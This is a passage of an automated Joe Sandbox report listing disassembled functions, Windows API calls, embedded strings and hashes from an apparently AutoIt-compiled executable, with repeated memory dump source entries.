                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Foreground
                                                                                                                                                                                                                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                                                                                                      • API String ID: 62970417-1919597938
                                                                                                                                                                                                                                                      • Opcode ID: 3e6545daa344bf38822931604c3cc0a78d82fcf0517fb6a2e90bcb6d836fda73
                                                                                                                                                                                                                                                      • Instruction ID: e853fe96cd1092943595151c86fc77aba29bc6aedef6eb9367017c60cb4ccb27
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e6545daa344bf38822931604c3cc0a78d82fcf0517fb6a2e90bcb6d836fda73
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79D1F630508246DBCB44EF20C981A9AFBF0FF54364F10591DF45A672A2DB31E99BEB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F23735
                                                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F5DC00,00000000,?,00000000,?,?), ref: 00F237A3
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F237EB
                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F23874
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00F23B94
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F23BA1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                                                                                                                                                      • Opcode ID: 47de226cae4cd2d36622709684b1e207eb930dff1f1fecb49dfb4889c0784c76
                                                                                                                                                                                                                                                      • Instruction ID: 607aeaf4ccb352e3810636bd8363d87619575415fc568c42fadc66ae9b04d0ee
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47de226cae4cd2d36622709684b1e207eb930dff1f1fecb49dfb4889c0784c76
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 060267756046119FCB14EF28D945E2EB7E5FF88720F04845DF98AAB2A2CB35ED01DB81
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00F26C56
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F26D16
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                      • API String ID: 3974292440-719923060
                                                                                                                                                                                                                                                      • Opcode ID: 2113a895e0f0f0657174a4b1041c26d9a06f5a216bbd3b984ff26c25853839b8
                                                                                                                                                                                                                                                      • Instruction ID: be855753bc245763160791e27a44e541504c772eef9a2b8b00dddeb5daca2723
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2113a895e0f0f0657174a4b1041c26d9a06f5a216bbd3b984ff26c25853839b8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1A18C312143559BCB14EF20DA51B6AB3E1FF84314F10996DB956AB3D2EB31EC06DB82
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00EFCF91
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EFD032
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFD045
                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EFD09A
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFD0D6
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00EFD10D
                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00EFD15F
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EFD195
                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00EFD1B3
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(00000000), ref: 00EFD1BA
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00EFD234
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFD248
                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00EFD26E
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFD282
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                                                                                                                                      • String ID: %s%u
                                                                                                                                                                                                                                                      • API String ID: 3119225716-679674701
                                                                                                                                                                                                                                                      • Opcode ID: 5da81cdb428c25b45f6b360c7560cceb4ccb52105087e1ed826689e485885add
                                                                                                                                                                                                                                                      • Instruction ID: 5ab653e59da67230050cbb6ef48e550658e63d82fe488aa238b99a55e24bc941
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5da81cdb428c25b45f6b360c7560cceb4ccb52105087e1ed826689e485885add
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0A1B07120820AABD715DF64CC84FBABBE9FF44318F105619FA99A2190DB30EA45CBD1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00EFD8EB
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFD8FC
                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00EFD924
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00EFD941
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFD95F
                                                                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 00EFD970
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00EFD9A8
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFD9B8
                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00EFD9DF
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00EFDA28
                                                                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00EFDA38
                                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00EFDA60
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 00EFDAC9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                                                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                                                                                                                                                      • Opcode ID: 94d956519c822eb921c2f245dd06996f8a3ab85423bd301cea71b32f2e45adf9
                                                                                                                                                                                                                                                      • Instruction ID: 6cfb22023ebbd005a73ed2db5666489519be1a8e0ea2d7cb216116db8cdf2b9e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94d956519c822eb921c2f245dd06996f8a3ab85423bd301cea71b32f2e45adf9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B81A23100C2499BDB05DF50CC85F7A7BD9EF85318F049469EE89AA095DB70D945CBA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                                                                                                      • API String ID: 1038674560-1810252412
                                                                                                                                                                                                                                                      • Opcode ID: 06e8b92068015f20822c28eb35e5038fbe9e98774a1f50961464f3614dbd66ec
                                                                                                                                                                                                                                                      • Instruction ID: 79fa2661a34936cbbac2c75e09466e9b690b01b16d4d70e438c109386483b581
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06e8b92068015f20822c28eb35e5038fbe9e98774a1f50961464f3614dbd66ec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3531BC32A4824CAADB19FA50CE43FEE77F59F20354F30202AF545710D1EB62AE45D613
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00EFEAB0
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EFEAC2
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00EFEAD9
                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00EFEAEE
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00EFEAF4
                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00EFEB04
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00EFEB0A
                                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EFEB2B
                                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EFEB45
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EFEB4E
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00EFEBB9
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EFEBBF
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00EFEBC6
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00EFEC12
                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00EFEC1F
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00EFEC44
                                                                                                                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EFEC6F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3869813825-0
                                                                                                                                                                                                                                                      • Opcode ID: 8c5a5f7f44d09713d7805ae88a2663b825625fb00e4615626b7e4d0672055ebd
                                                                                                                                                                                                                                                      • Instruction ID: 7016353a45580d69b9d14d48125a2eb4a5cd5f51103a626f88c5b585f6f00d9e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c5a5f7f44d09713d7805ae88a2663b825625fb00e4615626b7e4d0672055ebd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7513A7590070DAFDB21DFA8CD89B6EBBF5FF04709F004928E686A26A0D774B945DB10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00F179C6
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00F179D1
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00F179DC
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00F179E7
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00F179F2
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00F179FD
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00F17A08
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00F17A13
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00F17A1E
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00F17A29
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00F17A34
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00F17A3F
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00F17A4A
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00F17A55
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00F17A60
                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00F17A6B
                                                                                                                                                                                                                                                      • GetCursorInfo.USER32(?), ref: 00F17A7B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Cursor$Load$Info
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2577412497-0
                                                                                                                                                                                                                                                      • Opcode ID: b77bb5bc8eb8b0f92ea0bbaaf5e3b72652f8eb99c1a2262be71add1bdf33c7d9
                                                                                                                                                                                                                                                      • Instruction ID: 896b68d90e0731861d7a5b496f87ccb2702da0467931dd2c8d5cac7bde7fb4c4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b77bb5bc8eb8b0f92ea0bbaaf5e3b72652f8eb99c1a2262be71add1bdf33c7d9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C3103B1D4831A6ADB109FB68C8999FBFF8FF04750F50452AA50DE7280DA78A5418FA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00ECC8B7,?,00002000,?,?,00000000,?,00EC419E,?,?,?,00F5DC00), ref: 00EDE984
                                                                                                                                                                                                                                                        • Part of subcall function 00EC660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC53B1,?,?,00EC61FF,?,00000000,00000001,00000000), ref: 00EC662F
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00ECC93E
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1DFC: __wsplitpath_helper.LIBCMT ref: 00EE1E3C
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00ECC953
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00ECC968
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00ECC978
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00ECCABE
                                                                                                                                                                                                                                                        • Part of subcall function 00ECB337: _wcscpy.LIBCMT ref: 00ECB36F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                                                                                                      • API String ID: 2258743419-1018226102
                                                                                                                                                                                                                                                      • Opcode ID: 32602ec41c20131badc9710147d5ee2097611f7c61d9630cd0a8b054f1ecf177
                                                                                                                                                                                                                                                      • Instruction ID: 15bb71eac7cbbfe08f751bfae09b0a3e8720d6673a9abfd82b7f6db06711a303
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32602ec41c20131badc9710147d5ee2097611f7c61d9630cd0a8b054f1ecf177
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6312A1715083419FC724EF24C991EAFB7E4AF88314F14591EF48AA32A1DB31DA4ADB53
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F2CEFB
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?), ref: 00F2CF73
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F2CFF4
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F2D016
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F2D025
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00F2D042
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EC0000,00000000), ref: 00F2D075
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F2D094
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00F2D0A9
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00F2D0B0
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F2D0C2
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F2D0DA
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB526: GetWindowLongW.USER32(?,000000EB), ref: 00EDB537
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                                                                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                      • API String ID: 3877571568-3619404913
                                                                                                                                                                                                                                                      • Opcode ID: 7ba569479bc96920c15c964a77b138984ac05849dc02dca53a4feb73b094dd8f
                                                                                                                                                                                                                                                      • Instruction ID: 449db8f7ee84943f19f3f8063f20f73174091fb162967a2087e7a372b116b6ec
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ba569479bc96920c15c964a77b138984ac05849dc02dca53a4feb73b094dd8f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D071CA74540309AFE724CF28DC84FAA3BE9FB89714F04461DF985972A1D734E842EB22
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
